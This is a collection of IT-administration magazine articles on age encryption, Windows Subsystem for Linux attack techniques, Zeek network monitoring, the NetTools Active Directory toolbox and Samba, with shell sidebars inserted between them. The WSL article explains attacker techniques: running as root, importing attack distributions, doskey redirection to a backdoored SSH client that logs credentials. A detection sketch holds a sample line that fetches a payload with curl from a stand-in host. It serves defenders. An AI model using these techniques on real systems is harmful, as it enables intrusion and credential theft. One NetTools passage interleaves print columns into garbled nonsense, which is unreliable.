Age is a simple alternative to GnuPG that lets you encrypt and decrypt data asymmetrically, easily, and reliably. The clear design and the deliberate omission of options for configuring the encryption method help ensure secure use for everyday tasks. Thanks to support for different key types, you can also use the widespread SSH keys of your recipients.

Info
[1] Age Go implementation: [https://github.com/FiloSottile/age]
[2] Rage Rust variant: [https://github.com/str4d/rage]

The Author
Dr. Matthias Wübbeling is an IT security enthusiast, scientist, author, consultant, and speaker. As a Lecturer at the University of Bonn in Germany and Researcher at Fraunhofer FKIE, he works on projects in network security, IT security awareness, and protection against account takeover and identity theft. He is the CEO of the university spin-off Identeco, which keeps a leaked identity database to protect employee and customer accounts against identity fraud. As a practitioner, he supports the German Informatics Society (GI), administrating computer systems and service back ends. He has published more than 100 articles on IT security and administration.
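The umask advice from the article – tighten permissions before generating the key – can be illustrated as follows. A plain placeholder file stands in for the real key so the effect is easy to inspect without age-keygen installed:

```shell
# Sketch: restrict permissions on newly created files up front.
# private.key here is an empty placeholder, not a real age key;
# age-keygen > private.key would be subject to the same umask.
umask 077                  # new files get no group/other permissions
touch private.key
stat -c '%a' private.key   # -> 600
```

Setting the umask before the redirection matters: the shell creates the output file at that moment, so loosening permissions afterward would leave a window in which the key was world-readable.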

SECURITY: WSL Vulnerabilities

Attackers, defenders, and Windows Subsystem for Linux

Open House

Several tactics, techniques, and procedures circulating among cybercriminals exploit Windows Subsystem for Linux as a gateway. We look at how WSL can be misused and some appropriate protections. By Akshat Pradhan

Photo by Alistair MacRobert on Unsplash

As a compatibility layer, the Windows Subsystem for Linux (WSL) allows Linux binaries to run directly on Windows without any modifications. Users can call processes in Linux from Windows and vice versa with WSL, accessing files on both operating systems, sharing environment variables, and linking different commands.

Two WSL versions [1] have significantly different architectures: WSL 1 makes use of a translation layer that implements Linux system calls on top of the Windows kernel and relies on minimal Pico processes and providers (lxss.sys and lxcore.sys) managed by a kernel-mode driver. On its WSL blog, Microsoft provides more details on the role and history of the Pico processes [2]. In WSL 2, on the other hand, the source code of the Linux kernel is executed in a virtual machine, sized dynamically by Windows depending on the utilization level [3].

WSL is still in its early stages, but Microsoft is actively developing the project and adding additional features, such as GUI support for a fully integrated desktop experience [4]. The stated goal of WSL is to enable users to use their favorite Linux tools on Windows. However, WSL can also be misused for attacks. To do so, cybercriminals resort to various tactics, techniques, and procedures (TTPs).

Figure 1: PowerShell runs on Linux, albeit with missing cmdlets, among other things.

TTP 1: Tools

Attackers bypass the requirement to enter a sudo password by passing the -u root argument to wsl.exe, making it far easier to download and deploy arbitrary tools to run or create payloads. Cybercriminals also can add repositories of hacking distributions to deploy tools with a package installer. In a simple example of this technique, I use PowerShell, which interestingly can also be installed on Linux (Figure 1). What's more, you can easily download the tool from Microsoft's own repository. The obvious problem with this technology is that pwsh runs on


Linux. Accordingly, some cmdlets are not available – for example, those for the Common Information Model (CIM) and Windows Management Instrumentation (WMI). However, attackers can execute remote commands from WSL with PowerShell or use PowerShell over SSH to access Windows-specific cmdlets, allowing them to bypass PowerShell script logging.

However, the true strength of this attack technique is shown elsewhere: Hackers can develop modular loaders that are located entirely in WSL and then exploit the interoperability to run the Windows modules they need to achieve their goals. In fact, the loader completely disappears off the radar of most security solutions. For several years now, cyberattacks have been popping up time and again that take advantage of precisely this fact [5]: yet another tool in the attackers' arsenal that cyber defenders need to consider.

Containing this TTP is often difficult because installing utilities is basically a legitimate use case. Nevertheless, potentially malicious activity can be identified, for example, by deploying perimeter solutions with an anomaly detection function that includes identifying access to hacking repositories and verifying that the host in question has a legitimate use case for it.

TTP 2: Injecting an Attack Distro

Attackers have two options for installing their own distributions in WSL: They can either import a tarball or install the distribution directly from the Microsoft Store. Basically, any Linux variant will do; it does not have to come from the official Microsoft Store [6]. Alternatively, the attacker can create their own Linux derivative for WSL with known threats and tools. The command

PS> wsl --import <Distro> <Install location> <File>

binds a distribution into WSL. You can currently obtain a whole range of Linux distributions from the Microsoft Store (see the box "Distributions in the Microsoft Store"). Noticeably, the popular penetration testing distribution Kali Linux is also in the store, which means that any Windows computer with WSL in its IT environment can potentially be turned into a Kali computer. Thanks to Win-KeX, Kali offers a full desktop interface on WSL 2 [7]. Additionally, Microsoft has released a preview of WSL 2 support for running Linux GUI applications [8].

Mitigating such an attack would rely largely on system policies being enabled that prevent the features required to install WSL. If users are allowed to use WSL, you can rely on command-line identifiers to track down potential installation activity.

Distributions in the Microsoft Store
- Debian GNU/Linux
- Fedora Remix for WSL
- Kali Linux
- Ubuntu 22.04 LTS, 20.04, 20.04 ARM, 18.04, 18.04 ARM, 16.04
- SUSE Linux Enterprise Server 15 SP3, 15 SP2, 12
- openSUSE Tumbleweed, Leap 15.3, Leap 15.2
- Oracle Linux 8.5, 7.9

TTP 3: Redirecting Execution

The Windows doskey.exe [9] utility recalls the command-line history, edits the command line, and creates macros. What is exciting here is that macros take precedence over the PATH system variable search, which is why cybercriminals use it to disrupt the execution process.

Macros are instance-bound, however. To make them persist across all CMD instances, you need to create a macro definition file and add it to the AutoRun value under one of two keys, depending on the version of Windows you are using:

HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor

Alternatively, macros can be exported with the command:

PS> doskey.exe /macros > <file>

Redirecting execution to Linux can lead to persistence over patched binaries. In a scenario of this type with SSH redirection, Windows uses OpenSSH. The required client is preinstalled in Windows 10 [10]. Even in the absence of SSH, the attacker can create an SSH macro and redirect it to WSL, as shown in Figure 2. It then becomes persistent by exporting the macros and making the necessary registry changes.

Linux has several SSH backdoors [11]. Popular backdoors include the universal SSH backdoor, which patches SSH and its associated libraries to allow SSH logins with a password set by the attacker. The patched SSH binary also records the usernames, passwords, and IP addresses of all incoming and outgoing SSH requests as plain text in logfiles. As soon as a Windows user logs in to a remote computer by SSH, their credentials are exposed and logged in WSL. Then, attackers use those credentials for lateral movements.

Figure 2: Even without SSH, macros can be created and redirected to WSL.
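The precedence point behind this TTP is not Windows-specific: a doskey macro shadows whatever a PATH search would have found, much as a shell function or alias shadows a binary on Linux. A minimal sketch of the same shadowing effect, with an illustrative function name:

```shell
# Sketch: a shell function named like a binary wins over the PATH lookup,
# analogous to a doskey macro taking precedence in cmd.exe on Windows.
uname() {
  echo "intercepted"           # stand-in for a redirected command
}
uname > shadowed.txt           # calls the function, not /bin/uname
command uname >> shadowed.txt  # 'command' bypasses the function
cat shadowed.txt               # first line: intercepted
```

This is also why defenders auditing a box should prefer `command -V name` (or `type name` on Windows, `where` in cmd.exe) over just running a command to see what would actually execute.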


Existing security solutions should be designed to respond to the use of doskey.exe and the corresponding changes in the registry. However, a patched binary is not so easy to detect right away and would require the defender to run a check of the installed components (rpm -Va) within the WSL distributions. Another method is to use popular community tools like Rootkit Hunter to identify potentially malicious code.

Threat Hunting in WSL

The use of WSL in an environment generally looks suspicious if it is not one of the usual developer tools. You will want to monitor the environment for command lines containing wsl.exe and bash.exe. Additionally, DISM or PowerShell used to enable WSL or virtualization features can indicate unfriendly behavior.

You can mitigate WSL threats with optional feature policies, and you might want to disable virtualization and WSL with the PowerShell cmdlet

Disable-WindowsOptionalFeature

or the DISM utility. You also can hide the enable or disable Windows Features task by setting the NoWindowsFeatures value in the registry paths to 1:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Programs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Programs
NoWindowsFeatures 1

Finally, logging and auditing processes with tools such as Endpoint Detection and Response (Figure 3) also reduces potential risks.

Figure 3: Endpoint Detection and Response (EDR) can help mitigate the threat of WSL vulnerabilities.

Conclusions

The Windows Subsystem for Linux is a useful technology designed to improve productivity by integrating applications and utilities from various distributions into the Windows environment. However, such a large-scale project inevitably affects safety. Because attackers are focusing on WSL in their search for new TTPs, defenders need to establish appropriate protections.

Info
[1] WSL architectures: [https://docs.microsoft.com/en-us/windows/wsl/compare-versions#whats-new-in-wsl-2]
[2] Pico processes: [https://docs.microsoft.com/en-in/archive/blogs/wsl/pico-process-overview]
[3] WSL 2 source code of the Linux kernel: [https://github.com/microsoft/WSL2-Linux-Kernel]
[4] Linux GUI apps in WSL: [https://docs.microsoft.com/en-us/windows/wsl/tutorials/gui-apps]
[5] Bashware attack on WSL: [https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/bashware-attack-targets-windows-system-for-linux-wsl]
[6] Custom Linux distributions for WSL: [https://docs.microsoft.com/en-us/windows/wsl/build-custom-distro]
[7] Kali in WSL 2: [https://www.kali.org/docs/wsl/win-kex/]
[8] Preview of Linux GUI applications: [https://docs.microsoft.com/en-us/windows/wsl/tutorials/gui-apps]
[9] Doskey documentation: [https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/doskey]
[10] OpenSSH: [https://docs.microsoft.com/en-us/windows/terminal/tutorials/ssh]
[11] SSH backdoors: [https://blogs.juniper.net/en-us/threat-research/linux-servers-hijacked-to-implant-ssh-backdoor]
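The threat-hunting advice in this article – watch for command lines containing wsl.exe and bash.exe – can be sketched as a simple scan over exported process telemetry. The logfile name and its one-command-line-per-row format are hypothetical stand-ins for whatever your EDR actually exports:

```shell
# Sketch: flag process command lines that involve WSL binaries.
# proc_cmdlines.log and its contents are hypothetical sample data.
cat > proc_cmdlines.log <<'EOF'
C:\Windows\System32\svchost.exe -k netsvcs
C:\Windows\System32\wsl.exe -u root -e /bin/sh
C:\Windows\System32\notepad.exe
C:\Windows\System32\bash.exe -c "curl http://example.test/payload"
EOF
grep -iE '(wsl|bash)\.exe' proc_cmdlines.log > hits.log
wc -l < hits.log   # -> 2
```

In practice you would feed the hits into a second filter (known developer hosts, allow-listed parents) before alerting, because the article's caveat applies: WSL use by developers is a legitimate use case.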

SECURITY: Zeek

Network monitoring with Zeek

Light into Darkness

Zeek offers an arsenal of scripts for monitoring popular network protocols and comes with its own policy scripting language for customization. By Matthias Wübbeling

Photo by Susann Schuster on Unsplash

If you want to know what is happening on your network, the only way is to look at the connections between devices and to endpoints on the Internet. Popular tools such as tcpdump and Wireshark are useful for occasional analysis, but for permanent network monitoring and as an alternative to intrusion detection systems, Zeek is a very interesting tool.

Network Monitoring

Keeping track of device activity on the network is a routine task for IT administrators. Network monitoring is a large market comprising various tools, and vendors outdo each other with feature set claims, especially in the area of event processing and manual analysis.

Zeek, the first version of which was released back in 1999 (known as Bro at that time) [1], is a kind of hidden champion. The declared objective was to develop a tool for monitoring large volumes of data with a simple option for analyzing network traffic with self-programmed scripts, known as policy scripts. The name change to Zeek (think "seek") didn't happen for another 20 years or so.

Zeek offers an extensive arsenal of scripts for monitoring the popular network protocols and writing the monitoring results to various logfiles on your hard drive. From there, you can integrate the files into your existing log management or your installed security information and event management (SIEM) solution. The log data is compressed and archived at regular intervals, which is an effective way to save disc space, especially on busy networks.

Installation

Normally I use Docker when I try out software. Unfortunately, the Zeek developers do not provide their own Docker images, so my options were to find an alternative provider or create an image myself from the Dockerfiles they provided. You will need to allow some time for the Zeek build process.

The OpenSUSE Build Service is a faster approach. Developers offer ready-made packages there for the classic Linux distributions [2]. With your distribution's package manager, you can mount the required repository and install Zeek in the usual way. Of course, you can run your distribution in its own Docker container, too. To do this, start an Ubuntu container with the command:


docker run -ti --net=host \
  --name=zeek ubuntu:latest /bin/bash

The --net=host argument gives the container direct access to the host system's network interfaces, which it will need to read all the traffic on the interface. The --name=zeek argument explicitly names the container and makes connecting with the container easier later on. Before you follow the instructions for installing Zeek [2], first use the command

apt update && apt install -y sudo curl gnupg vim net-tools

to install the dependencies in the running Ubuntu container.

Configuration and Start-Up

Fortunately, you do not need to configure Zeek extensively before using it for the first time: Just specify the name of the network interface on which you want to monitor the traffic. Of course, running the server with Zeek on a mirror port of your router or switch is a good idea. All data packets that are transmitted are also transferred to the mirror port.

Assuming the interface on this port is named eth1, you can configure the interface and the host name in the respective line of the /opt/zeek/etc/node.cfg file:

[zeek]
type=standalone
host=localhost
interface=eth1

Now run the management tool zeekctl, install the supplied policies, and launch Zeek with:

/opt/zeek/bin/zeekctl
[ZeekControl] > deploy

The output should show the command workflow. If you see an error message, you can use the Zeek diag command to discover why. Check the name of the network interface and make sure a process is not already listening in the background on TCP port 47760, which is used by Zeek.

Now type exit to quit the management tool and begin to generate network traffic on the host. You can watch new logfiles appearing in the /opt/zeek/logs/current folder. The first file created here is conn.log, which simply lists all network connections. The list grows quickly, and files dns.log, dhcp.log, and ntp.log give you an initial idea of which logs Zeek pre-filters for you in the background.

If you run a DHCP server on your network and after some time use cat to display the content of the dhcp.log file, you will see requests from different network devices and the assigned IP addresses. If you open a web page, for example, with the

curl https://www.admin-magazine.com

command, you will then see an entry in both the dns.log and the http.log files. However, because Zeek cannot resolve TLS connections, you will find most calls to web pages in the ssl.log file.

If you let Zeek run for a little while longer during your day, you will notice that it keeps archiving the files. Each day will have a folder with the matching date in /opt/zeek/logs. Look for the weird.log file in the archive subfolders, also with the corresponding dates and compressed by gzip. If you unzip these files and take a look at the content, you will see that these logfiles contain unusual events, such as the reuse of existing connections or errors in UDP and TCP checksums.

Converting Logs to JSON

To make the log data easier to handle, you can change the tab-delimited logging to a more modern JSON format. To adapt the configuration, add the following two lines to your /opt/zeek/share/zeek/site/local.zeek file:

# Output in JSON format
@load policy/tuning/json-logs.zeek

Now, with the deploy command used earlier, restart the Zeek process and check the format in the logfiles. For further analysis of your log data, you can also connect tools that expect input in JSON format.

Conclusions

For administrators, reliable insights into network traffic are a must-have. They not only help you identify and analyze problems, but detect possible attackers. Zeek can already look back on more than 20 years of development, delivering a classic approach to monitoring network activity. The tool comes with its own policy scripting language [3] for customization. With its help, you can flexibly adapt your monitoring setup to suit your needs or expand the analysis options to include more network protocols, if required.

Info
[1] Paxson, V. Bro: A System for Detecting Network Intruders in Real-Time. Computer Networks, 1999;31(23-24):2435-2463, [https://www.icir.org/vern/papers/bro-CN99.pdf]
[2] Zeek packages: [https://software.opensuse.org//download.html?project=security:zeek&package=zeek]
[3] Policy scripts: [https://docs.zeek.org/en/master/scripting/basics.html]

The Author
Dr. Matthias Wübbeling is an IT security enthusiast, scientist, author, consultant, and speaker. As a Lecturer at the University of Bonn in Germany and Researcher at Fraunhofer FKIE, he works on projects in network security, IT security awareness, and protection against account takeover and identity theft. He is the CEO of the university spin-off Identeco, which keeps a leaked identity database to protect employee and customer accounts against identity fraud. As a practitioner, he supports the German Informatics Society (GI), administrating computer systems and service back ends. He has published more than 100 articles on IT security and administration.
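Working with the archived, gzip-compressed logs the article describes is easily scripted. The sample conn.log content below is a hypothetical, heavily simplified stand-in for real Zeek output (real logs carry #fields header lines and many more columns), but the unzip-and-extract pattern is the same:

```shell
# Sketch: extract one column from a rotated, gzip-compressed log.
# The log content is illustrative, not genuine Zeek output.
printf '1.2.3.4\t10.0.0.5\t443\n1.2.3.9\t10.0.0.5\t53\n' > conn.log
gzip conn.log                   # rotation leaves files like conn.log.gz behind
zcat conn.log.gz |
  awk -F'\t' '{print $3}' |     # third column: destination port here
  sort -n > ports.txt
cat ports.txt                   # -> 53, then 443
```

For real tab-separated Zeek logs, the bundled zeek-cut utility is the more robust choice because it selects columns by field name from the #fields header; once you switch to JSON logging, jq takes over that role.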

MANAGEMENT: NetTools for AD

Active Directory management with NetTools

Health Check

NetTools utilities extract information from Active Directory to help admins simplify troubleshooting and administration. By Klaus Bierschenk

Photo by Hush Naidoo Jade Photography on Unsplash

Active Directory administrators have a massive choice of tools, starting with the integrated administration tools on Windows Server and including a variety of free and commercial programs. This toolbox can be nicely rounded off with the free NetTools: in total, more than 90 utilities that simplify troubleshooting and administration.

NetTools [1] notches some initial brownie points directly after you download its single EXE file. You don't need to install a tool palette, and there are no dependencies on frameworks or DLLs. However, this doesn't translate to a hodgepodge of command-line tools; instead, everything is available in a central management interface without the need for context changes. The only add-on is an INI file with work files for the current configuration and user-specific information. If nettools.ini does not exist, it is created at program launch time. Software can be that simple, and it makes installation on a domain controller less critical because it avoids any risk of trouble with components installed at the same time.

On the website you can look forward to some very good and, above all, up-to-date documentation – not necessarily a matter of course in the world of freeware. The FAQ section is helpful, especially for newcomers, and helps you find your way around. A list of all functions and a carefully maintained blog round off the information collection. The author offers readers tips and tricks for the utilities, accompanied by plenty of examples. NetTools starts exactly where the on-board tools leave off. Therefore, it is not intended to be an alternative to existing tools, but deliberately closes functional gaps.

Targeted Profiles

By default, you work with the toolbox in the context in which you have logged on. For more flexibility, you can create profiles that include both connection data for a specific domain controller, or even a different domain, along with the user account. A profile can be specified in the course of a specific action, which means you do not need to be interactively logged in as a domain admin to act in the context of the domain admin's authorizations. All profile information is stored in the INI file – except for the passwords. The passwords are not stored anywhere but need to be retyped each time.

Even at first glance, the tools' graphical user interface (GUI) is neat and tidy and the buttons are self-explanatory. For newcomers, it is still advisable to consult the help on the website, which simplifies getting started with the GUI and includes instructions on how to handle the profiles.

Integrated GUI Functions

The NetTools feature set is not just the individual tools lined up ready for use on the left side of a GUI. Useful elements are also embedded directly in the GUI (e.g., in the context menus of the objects). Taking a user object as an example, you can easily search for it by typing the name or part of it, without wildcards, in the search bar at the top of the screen. The results appear in the main window, and from this list you can select an element by right-clicking. The treasure trove of information in the context menu is a revelation for any admin.

Last Logon, for example, shows detailed information about the respective object: When and how often did the user log in recently? Which domain controller processed the login? Was the password entered incorrectly? When was it last changed? The Use With menu has even more to offer: The Group Changes subitem gives you information on the history of group assignments in addition to group memberships. You can easily see when a user has been removed from or added to a group, for example. The various options in


the context menu invite admins to browse and try them out.

Finding Differences

Comparing two objects is a fairly common scenario. Staying with the user object, I will look at an example related to permissions in Active Directory. A comparison in NetTools always involves two steps: First, select an element from the list of users (or other objects), again using the context menu, this time with the menu item Select left SD to compare (where SD stands for security descriptor, the place where permissions are stored for a user object).

After selecting the option, the GUI remembers the object. In this example, assume you have selected the Christa user account. Now you can display the second object with another search. If you open the context menu again, you will see the Compare to 'Christa' SD item. A new window then shows the differences between the two user objects in tabular form. This view contains a column header at the top. Worth noting is the column with the symbols. The developer chose this symbolism to illustrate the several possibilities. Clicking on the * shows hints about the different symbols; what's more, you have the option to select a filtering character for the display, which means you can reduce the list to elements of the objects that are identical or precisely not identical.

Other Options for Comparisons

Comparisons often help during troubleshooting group memberships, as well. How do two user accounts differ in terms of their group memberships? To find out, the procedure is similar to what you just saw. This time, choose Use With | Group Compare. The memberships are listed, and you can see directly what is going on in relation to two objects.

These examples are just a few that show how useful functions are integrated into the view and the context menu. A lot more is waiting, though. For example, you can see whether a conflict exists with accounts in another domain from the email address.

Connection Check Between DCs

Domain controllers (DCs) maintain active communication with each other. For this reason, it can be challenging when firewall rules do too much of a good thing – especially between remote sites – and important ports are closed. The resulting error patterns are difficult to interpret and usually show up in completely different places. A function integrated into NetTools tests the connectivity between domain controllers and, in the event of individual errors, displays them at the port level. Admittedly, the Test-NetConnection cmdlet does the same job, but it is not as nicely integrated into a GUI. All of the ports important for AD communication are already included. You also have the option of specifying individual ports that will be included in the test.

Staying with the network, in terms of site topology, correct mapping of subnets, the site, and the domain controller is immensely important. Among other things, mapping ensures that computers can find their DC. If parts
Worth noting is the column with the other domain from the email address computers can find their DC. If parts
asterisk (*) header (Figure 1) that of a user account (e.g., as a check cri- of an IP address range are assigned
shows the results of comparisons terion before migrating the account). to multiple subnets, overlapping sub-
between values in the columns as spe- A look at not only user objects but nets occur, which can lead to issues
cial symbols, allowing you to identify also computer accounts in the context that are difficult to track. Although
whether permissions are identical, menu of an object is definitely very this situation is not an immediate
partially identical, or not available for helpful if you want to discover the threat, unnecessary network traffic
comparison for one of the two objects. full potential. can try users’ patience; after all, you

Figure 1: Two objects compared: Smart symbols help you identify differences.
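As an aside to the DC connectivity test described above: the same idea can be approximated at the command line. A rough bash sketch, not NetTools code; the host name dc2.example.com is a placeholder, the function name is ours, and the port list covers common AD ports (DNS, Kerberos, RPC, LDAP, SMB, kpasswd, LDAPS, Global Catalog):

```shell
# Probe the TCP ports most relevant to AD communication on a remote DC.
check_port() {  # usage: check_port <host> <port>
  if timeout 2 bash -c "exec 3<>/dev/tcp/$1/$2" 2>/dev/null; then
    echo "$1:$2 open"
  else
    echo "$1:$2 closed/filtered"
  fi
}

for port in 53 88 135 389 445 464 636 3268 3269; do
  check_port dc2.example.com "$port"
done
```

Unlike Test-NetConnection or the NetTools function, this only tests plain TCP reachability; it says nothing about the service answering behind the port.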


probably want each computer to communicate with the closest DC. The Overlapping Subnets function, which can also be found in the sidebar, is where the subnets and the respective masks are calculated and overlaps are displayed. You do not have to specify a network range, because the function accesses the subnet information of the topology and calculates possible overlaps.

Replacement for GPOTool

Some of you might remember the Windows Server 2003 Resource Kit, which included a tool named GPOTool.exe that inspected and tested group policies. However, Microsoft did not provide a replacement for this feature after the resource kit was discontinued. Luckily, NetTools has a similar function named GPO Explorer.
After launching the tool, you are taken to an overview of the state of group policy objects (GPOs), which initially appears to be similar to the Group Policy Management Console (gpmc.msc). A closer look reveals small but subtle differences. With just a few clicks, you can view assigned GPOs, output their contents by scrolling and switching between policies, and more. A Test button lets you test a single GPO. Alternatively, you can select the node with the domain name up front to check the entire environment by including one or more DCs, or just a certain number of GPOs, in the test.

Monitoring Replication

Replication, and therefore the distribution of changes in Active Directory, is one of the directory service's most important functions, especially for infrastructures whose sites and domain controllers provide services even though they are physically remote from each other. Unfortunately, inconsistencies in synchronization can cause very unpleasant glitches, with a wide variety of causes. The network, domain name system (DNS), or even policies can sometimes interfere. NetTools comes with a number of features in the AD Replication section that can help shed light on this problem.
The monitoring functions range from health checks for a site to analyzing replication at the attribute level. The Attribute Replication function (Figure 2) lets you look into the details. To do this, you need to specify the distinguished name (DN) of the object to be examined. A detail window then shows the attributes of the object, along with a list of domain controllers in the left-hand section. After you decide which of the DCs need to take part in the comparison, pressing Compare displays the attribute content for each DC.
The AD Replication | Domain Changes option is somewhat simpler, but just as helpful. After specifying a domain controller, replication information is returned if a change has occurred. If you want to know how long it takes for changes in a partition to replicate, Replication Latency is the right place to look. To begin, you need to specify the DN of an object; it is then created and deleted again. Both write processes can be monitored in terms of time. In this way, comparisons can be made and any weak points in regional network connections can be located.
Depending on the application scenario, you can use the tool that best suits each case. The current 1.31 version of the toolbox contains 10 functions that offer versatile views of replication, which is all the more valuable because the on-board tools have little to offer in this regard.

LDAP Directory Without the Frills

NetTools enables versatile access to LDAP directories with various LDAP functions. The focus is on Active Directory, but you are not restricted to AD as long as the directory you want to access follows the LDAP API standard. An LDAP browser delivers directory information in the form of raw data, unlike the Active Directory admin tools that prettify

Figure 2: Help with troubleshooting: Attribute Replication checks whether identical object information exists on several DCs.
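As a side note to the overlapping-subnets check described above: the underlying containment rule fits in a few lines of shell. This is a hypothetical illustration, not NetTools code; two IPv4 subnets overlap exactly when the network address of one falls inside the other:

```shell
# Convert a dotted-quad IPv4 address to a 32-bit integer.
ip2int() { IFS=. read -r a b c d <<<"$1"; echo $(( (a<<24)|(b<<16)|(c<<8)|d )); }

# Do two subnets in CIDR notation overlap?
overlap() {
  local n1=${1%/*} p1=${1#*/} n2=${2%/*} p2=${2#*/}
  local m1=$(( (0xFFFFFFFF << (32 - p1)) & 0xFFFFFFFF ))
  local m2=$(( (0xFFFFFFFF << (32 - p2)) & 0xFFFFFFFF ))
  local a=$(( $(ip2int "$n1") & m1 )) b=$(( $(ip2int "$n2") & m2 ))
  # One network address lies inside the other subnet => overlap.
  [ $(( a & m2 )) -eq "$b" ] || [ $(( b & m1 )) -eq "$a" ]
}

overlap 10.1.0.0/16 10.1.4.0/22 && echo "overlap"   # → overlap
```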


data here and there and validate user input before making changes. For example, the LDAP Search function integrated into NetTools supports SSL-based access, and even write access is possible without leaving the client.
An admin does not need any knowledge of LDAP syntax. The query criteria are created in the GUI with the use of drop-down lists (Figure 3). More than 280 predefined LDAP queries are found under Favorites, which is very useful. Besides illustrative material, you'll find a number of useful tools for practical admin work.
Most administrators will be really excited to see the catalog of LDAP queries. Do you need a list of groups without members? Do you want to know which GPOs were modified in the last 10 days? Predefined queries bring this information and far more to light. New queries are quite easy to create by editing existing queries and then adding the modified versions to the catalog. The ability to import and export LDAP statements via the clipboard rounds off the feature set, leaving virtually no wishes unfulfilled. The option to write the output to files means that you are not restricted to the GUI in the tool but can process the info downstream (e.g., in Excel).

Advanced View 2.0

Like the standard Users and Computers console (dsa.msc), you can also use the various NetTools functions to display object properties. You are probably aware of the advanced display variant in dsa.msc if you enable the Advanced Features in the View menu. The Properties dialog for a user account still provides the basic info in this case, but you can also display other content such as the object attributes.
Much more awaits you in NetTools. The information is integrated in the Properties dialog and varies as a function of the type of object you are viewing. For a user account, for example, you also have the option of displaying the last password change date, the Fine Grain Password Policy if applicable to the user, or which domain controller the user logged in with and how often they did so. This information can help narrow down individual issues.

Checking Groups for Changes

Previously you looked at the group membership history starting with a user object. This view also works in the other direction – that is, starting

Figure 3: Like the cockpit of an airplane, the LDAP client comes with a plethora of settings.
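Under the hood, predefined queries like the ones mentioned above are ordinary LDAP filters. Two hypothetical examples of that kind (not taken verbatim from the NetTools catalog):

```
# Groups without members:
(&(objectCategory=group)(!(member=*)))

# GPOs changed since a cut-off date (the timestamp is a placeholder):
(&(objectCategory=groupPolicyContainer)(whenChanged>=20220601000000.0Z))
```

LDAP itself has no relative dates, so a query for "the last 10 days" has to compute the whenChanged cut-off before the search is issued.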


with a group. To find out what changes have been made, for example, in the Domain Admins group, you need to view the group in one of the NetTools views. The easiest way to do this is to use the search box at the top of the toolbar. Uncheck Return Users Only; otherwise, the search will fail. You also need to pay attention to the spelling of the group names. In this case, one AD domain controller was a German server; accordingly, the group name was Domänen-Admins (Figure 4), but this is just a side note.
To find out what activities have taken place in this group, navigate to the context menu by right-clicking and then selecting AD Properties. In the Properties, focus on the Members tab to view the current members of the group. Unlike in the Users and Computers console, the Removals field here already displays the latest accounts to have been removed from the group. You can go into even more detail by pressing the Changes button. Another window provides data on when accounts were added and removed.
In this context, I need to mention once again the LDAP catalog, with its diverse query options. It also includes queries relating to group administration, especially for administrative groups. Note also that the group names in the queries might need to be adjusted to match the language of the domain controller: The LDAP queries are all based on the built-in group names in English.

Schema – Under the Hood

Administrators are pretty sure to be familiar with the history and updates of their own schemas; after all, this is "their" Active Directory and the info is essential. What happens, though, if you need to investigate the schema, versions, and update history of someone else's AD? The functions in the Schema category can be helpful. The Schema Versions item helps you find out what changes have been made to the schema, for both the Active Directory and Exchange schemas. Schema History takes this one step further and shows you the schema history (i.e., when which update was made to the schema).
In addition to the quite extensive NetTools functions, a number of minor functions can brighten up your everyday life as an administrator. For example, the unique security identifier (SID) of an Active Directory object or the name behind a SID is displayed by the SID converter. You have probably viewed the event log of a domain controller that revealed a problem with a user that had a SID of 123 et cetera, but who is this user? Of course, you have PowerShell cmdlets or the wmic useraccount command with the get sid or get name parameters, but it's good to know that NetTools has a converter, especially if you are working in the NetTools GUI and with identities anyway.
Speaking of converters: The Time Converter lets you convert a time to some other format, including 64-bit. This function certainly is not used on a daily basis, but if you ever need it, it is reassuring to know it can be found in the toolbox.

Conclusions

When you work with NetTools, it becomes clear what a wealth of information Active Directory offers. Experienced administrators who have managed without NetTools so far will have loads of fun with it. You will be surprised to see the bouquet of utilities that squeeze the last snippet of information out of Active Directory.
Great attention has been paid to detail in the functions themselves, which definitely helps in daily operations. Despite all the praise, people are bound to look for things that could be improved, and for the many admins who like to avoid mouse pushing, a call for a command-line interface might be justified, considering NetTools sees itself as a purely GUI-based tool.

Info
[1] NetTools: [https://nettools.net]

Author
Klaus Bierschenk is an Executive Consultant at CGI Germany, a speaker at conferences and community events, and technical author of various publications. You can find him on his blog http://nothingbutcloud.net/.

Figure 4: Group Changes lets you track the latest group changes for a user account.
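A note on the 64-bit times mentioned above: these are Windows FILETIME timestamps (100-nanosecond ticks since January 1, 1601, UTC), as stored in AD attributes such as pwdLastSet. A minimal shell equivalent of one such conversion (the function name is ours):

```shell
# 11,644,473,600 seconds lie between 1601-01-01 and the Unix epoch;
# dividing by 10^7 turns 100-ns ticks into seconds.
filetime_to_unix() {
  echo $(( ($1 - 116444736000000000) / 10000000 ))
}

filetime_to_unix 116444736000000000   # → 0 (1970-01-01 00:00:00 UTC)
filetime_to_unix 132539328000000000   # → 1609459200 (2021-01-01 00:00:00 UTC)
```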

MANAGEMENT | Samba AD Domain Controller

Samba domain controller in a heterogeneous environment

Shake a Leg
The open source Samba service can act as an Active Directory domain controller in a heterogeneous environment. By Andreas Stolzenberger

Photo by Zachary Nelson on Unsplash

An Active Directory (AD) domain controller (DC) serves as a central logon server in heterogeneous networks with Windows, Linux, and macOS clients. This task does not necessarily have to be handled by a Windows server. The open source Samba service can also act as a DC.
Heterogeneous networks with servers and clients running both Linux and Windows need a centralized management server for the user directory and a standardized protocol for network shares. Windows systems naturally prefer Active Directory for this purpose, but technologies such as Kerberos and Lightweight Directory Access Protocol (LDAP) for securing user access rights are open source. The obvious choice would seem to be the open source FreeIPA directory server. However, FreeIPA mainly targets Linux systems and user and group management. FreeIPA lacks some features needed to act as a DC that a Windows system provides over the Server Message Block (SMB) and Common Internet File System (CIFS) protocols. Version 4 of the well-known open source Samba file service, on the other hand, provides a complete DC implementation.
The Samba project has been around for some 30 years now. It started life as a free Unix client for DEC Pathworks, which was partly based on the technology of the IBM OS/2 LAN Server and Microsoft LAN Manager. In the 1990s and early 2000s, the open source project initially fell foul of Microsoft, with repeated disputes. When Microsoft revamped its "Linux is cancer" (Steve Ballmer) stance to "Microsoft loves Linux" (Satya Nadella), the software giant's relationship to the open source project changed. Microsoft employees have been part of the Samba development team since 2011. Additionally, Microsoft has now openly documented the SMB protocol, which helps Samba developers.
